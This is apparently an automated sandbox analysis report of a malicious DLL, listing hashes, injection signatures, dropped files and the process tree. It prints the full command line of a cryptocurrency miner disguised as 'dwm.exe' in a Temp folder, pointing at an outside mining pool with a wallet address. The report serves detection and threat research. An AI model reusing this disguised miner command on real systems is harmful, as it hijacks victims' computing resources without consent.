Analysis
-
max time kernel
179s -
max time network
182s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 20:44
Static task
static1
Behavioral task
behavioral1
Sample
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll
Resource
win10v2004-20220812-en
General
-
Target
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll
-
Size
1.2MB
-
MD5
bf52463eb2b43eef8412bda49f2602b9
-
SHA1
8eeedc0baba079bc5811027f043ff034c1173c5e
-
SHA256
a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74
-
SHA512
bab6a03bad5003b043e851c2ed5108137acc9be584b8024075e6db1f74aea7823ea25a3cf094f7d2aa98e059b310fba51476e27f414b340f3207ad32a78c9377
-
SSDEEP
24576:VJPVpkCOvt+H5ZRwLZSblLAxRfbJT6+uEkMIAsTWRsrUVQBB:jIvoRwlSlURfbJrbGAe7LB
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
dwm.exepid process 4444 dwm.exe -
Loads dropped DLL 6 IoCs
Processes:
dwm.exepid process 4444 dwm.exe 4444 dwm.exe 4444 dwm.exe 4444 dwm.exe 4444 dwm.exe 4444 dwm.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 2828 wrote to memory of 4908 2828 rundll32.exe rundll32.exe PID 2828 wrote to memory of 4908 2828 rundll32.exe rundll32.exe PID 2828 wrote to memory of 4908 2828 rundll32.exe rundll32.exe PID 4908 wrote to memory of 4444 4908 rundll32.exe dwm.exe PID 4908 wrote to memory of 4444 4908 rundll32.exe dwm.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\a5960caee08c88b409e86ec0fcac60cfd2fff0e899ec17154ae8e462fa3b4f74.dll,#12⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeC:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -a cryptonight -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -p x -u 42ychz53apvgs3EHMoeAyGQM3pq7EikTLTBu1RaBj8njgVfykF4v8HdPNyzAfDTDUGZfoLjMdh9Wa4u1Bm2t3f7aSFSwS4U.03 -t 163⤵
- Executes dropped EXE
- Loads dropped DLL
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
892KB
MD5a76fd14d26b739aa7fe4358c30c1d30e
SHA10b8f2ec4de56088700409483a5793bd35c85cd9e
SHA256cf2bff3b2cbe17ff387c69f3715e346b8f2e122aafec16b292dff34101bf44b4
SHA5123b01fab0eae273cde92af6b72587dbbe0c1834c82512d54a175168071295ec8af99260aaf78638eadb70496382d4c6eefcda3b8083a230b3cb910152499e6e4a
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
892KB
MD5a76fd14d26b739aa7fe4358c30c1d30e
SHA10b8f2ec4de56088700409483a5793bd35c85cd9e
SHA256cf2bff3b2cbe17ff387c69f3715e346b8f2e122aafec16b292dff34101bf44b4
SHA5123b01fab0eae273cde92af6b72587dbbe0c1834c82512d54a175168071295ec8af99260aaf78638eadb70496382d4c6eefcda3b8083a230b3cb910152499e6e4a
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libcurl-4.dllFilesize
511KB
MD5882a19580596d8e90e1f95ea3320347e
SHA1cef622275d69a206d84363ea07b243ab9804d2f5
SHA2567719ddd67ff07beb26bc31d1cf925f278e302e6163e02169ff7dcefcb651e007
SHA512ea138d1d53ee183caf4fec9bead1f71517de13fb34be826ab87941830199e2d6b925146fa9461537e86fe2b4ab24556ebc5ca5cee71e25146c02beae26a3a5f9
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libcurl-4.dllFilesize
511KB
MD5882a19580596d8e90e1f95ea3320347e
SHA1cef622275d69a206d84363ea07b243ab9804d2f5
SHA2567719ddd67ff07beb26bc31d1cf925f278e302e6163e02169ff7dcefcb651e007
SHA512ea138d1d53ee183caf4fec9bead1f71517de13fb34be826ab87941830199e2d6b925146fa9461537e86fe2b4ab24556ebc5ca5cee71e25146c02beae26a3a5f9
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libiconv-2.dllFilesize
128KB
MD5f4ba452fce20265a52cf629e52764813
SHA14a1ab11777b65ca77f27a2bce7f3ea1d3d4fdda6
SHA25606ccf8536e89ee05801827b56d27724ad4cea84b093165e7153cbbd466e6063c
SHA5128924e5a5ae143ea3a1bf6dadbad0802dfdc86a70edf7cd6d0df4e433d9071a4eaea45a06c5950ecfa9aa5d3df97a113f31aa80c74729f2753e5c38c5c65c24ac
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libiconv-2.dllFilesize
396KB
MD5609151585ff8eb8274165f0b03b99076
SHA181902816d351a7845a28059baf342b7576c296cc
SHA256a61cfb59fbc0f1038f95492a1d0f3560a3e2eec50e6a6ff0f66cedf9cbbd65f2
SHA512d5a7d83140638bf447d14cd29197c6bcd71d2dd6b1f6aa9d85388a53ca26f3c4b77bcc57a0f43df7dacca15e2185ee829956429d19a5e649b4242b72961b8318
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libidn-11.dllFilesize
206KB
MD5f8a0d5fe3fd8569ed3cac7318cdc493a
SHA127a82c19abbadff848f86ee9b9ed579c8b1f7b7b
SHA2566e4d69c688b9f318bb497cd7a322df2e5470529880420b783061fa87aa916570
SHA512f0328b52a14e9f3d3f72b8f77431bd757ccd5b10d65b5e8d7d67f733e09b23aa6113147cf53a9a0518cb6a4810027e5985ac109b604396cc75abfb35752cf9e0
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libidn-11.dllFilesize
206KB
MD5f8a0d5fe3fd8569ed3cac7318cdc493a
SHA127a82c19abbadff848f86ee9b9ed579c8b1f7b7b
SHA2566e4d69c688b9f318bb497cd7a322df2e5470529880420b783061fa87aa916570
SHA512f0328b52a14e9f3d3f72b8f77431bd757ccd5b10d65b5e8d7d67f733e09b23aa6113147cf53a9a0518cb6a4810027e5985ac109b604396cc75abfb35752cf9e0
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libintl-8.dllFilesize
112KB
MD59650b3149085e7df43acad2703b81fd8
SHA138d25e33825a67943fb8081a651d854fcdbfdc15
SHA25634618f63fd89c387019f7c061846d318fa98b52c7d9025de093d442f29d4e87b
SHA5124f8eff628f279d9d042801837518d501420a9b8d85771cbe26bc40ded2e5a701d665838e0c672fef8e0e694b4cc853e07364915ae39cc68f6bd96ff3dae5e9e7
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libintl-8.dllFilesize
112KB
MD59650b3149085e7df43acad2703b81fd8
SHA138d25e33825a67943fb8081a651d854fcdbfdc15
SHA25634618f63fd89c387019f7c061846d318fa98b52c7d9025de093d442f29d4e87b
SHA5124f8eff628f279d9d042801837518d501420a9b8d85771cbe26bc40ded2e5a701d665838e0c672fef8e0e694b4cc853e07364915ae39cc68f6bd96ff3dae5e9e7
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libwinpthread-1.dllFilesize
298KB
MD5bb0019619d0e3b013018ba6cbfb6185f
SHA1c23b023ac220283b81d98bbdf5ada3e40ab20e60
SHA2564dd3c7262580fb8a03813c249b643d81dd0e5b90e883102a33a5a1d62500132e
SHA5129b2731e63d50b78bf27b680f3ef33b85e68659dadaf9734ccbeb9297370c323e39d13a5b794b705a892203064dad156f6471612cb40415d6d7701347641db0a8
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\libwinpthread-1.dllFilesize
298KB
MD5bb0019619d0e3b013018ba6cbfb6185f
SHA1c23b023ac220283b81d98bbdf5ada3e40ab20e60
SHA2564dd3c7262580fb8a03813c249b643d81dd0e5b90e883102a33a5a1d62500132e
SHA5129b2731e63d50b78bf27b680f3ef33b85e68659dadaf9734ccbeb9297370c323e39d13a5b794b705a892203064dad156f6471612cb40415d6d7701347641db0a8
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\zlib1.dllFilesize
113KB
MD5cb0577e362e193cad14c3d23c40c30d4
SHA165db52c270bc8f1e9435d95456da9f1e45e74fd9
SHA2569e93a45fb249f32d1aac4e69ce84ceae783782e75148e572fdde3bfe2579121c
SHA5124c1cc231599e0928ae67d1e3493417b35c6185739795b00da8cad6580a44f56df3769d652f8dd1798e762c11e87904bf0624fe6c2392b2e35fba15160959b32b
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\zlib1.dllFilesize
113KB
MD5cb0577e362e193cad14c3d23c40c30d4
SHA165db52c270bc8f1e9435d95456da9f1e45e74fd9
SHA2569e93a45fb249f32d1aac4e69ce84ceae783782e75148e572fdde3bfe2579121c
SHA5124c1cc231599e0928ae67d1e3493417b35c6185739795b00da8cad6580a44f56df3769d652f8dd1798e762c11e87904bf0624fe6c2392b2e35fba15160959b32b
-
memory/4444-133-0x0000000000000000-mapping.dmp
-
memory/4908-132-0x0000000000000000-mapping.dmp